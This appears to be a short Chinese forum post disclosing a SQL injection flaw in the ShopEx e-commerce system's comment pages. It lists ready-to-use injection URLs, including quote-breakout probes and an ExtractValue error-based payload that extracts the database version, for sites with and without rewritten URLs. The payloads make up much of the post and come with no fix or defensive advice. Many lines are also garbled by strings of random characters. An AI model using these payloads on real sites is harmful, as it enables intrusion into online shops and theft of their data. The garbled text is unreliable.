注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… ! ]/ P: C: H7 B; ^' F2 {
! k; L+ ]% y% L3 J$ j
好吧,我扯远了~~
/ A; K# p: M* j& a其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~+ o2 ]* O2 ]% J7 m+ S% ?8 G8 \
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: 7 S1 E9 E3 p" I5 q
H8 z% s( w- Z0 ^8 L* T, k) v bhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
" h, `/ m& v5 [4 A* }7 L" }" x" d3 s/ Y' H8 H# V7 U$ J7 b
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html $ ^; F! \, b) |$ k5 K! G$ F, x, O; ?
( |- s; d; L) S+ }# ?
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
) {% d" R9 y# j: J# C( t; F, `" T6 F( @; b
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 6 ]9 \& T K1 S& }8 ]/ m) c/ Y
* ]5 ^& |3 z/ u, f4 a8 U; u 5 ^0 g- d: y5 L ^1 C
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。7 A7 z$ U5 a/ r7 z0 J! I) T. h1 K8 ~
如何注入就不多说了,10多年的东西了…不会也会了… 7 F- M$ P5 x) c
1 W. B5 K4 f) s& T1 Z5 w6 T. j: d2 O" q% o5 \ f
; F+ y7 X: C" D' |2 _1 k; J6 V* u! i
6 q: G4 x4 v- R1 D x& U |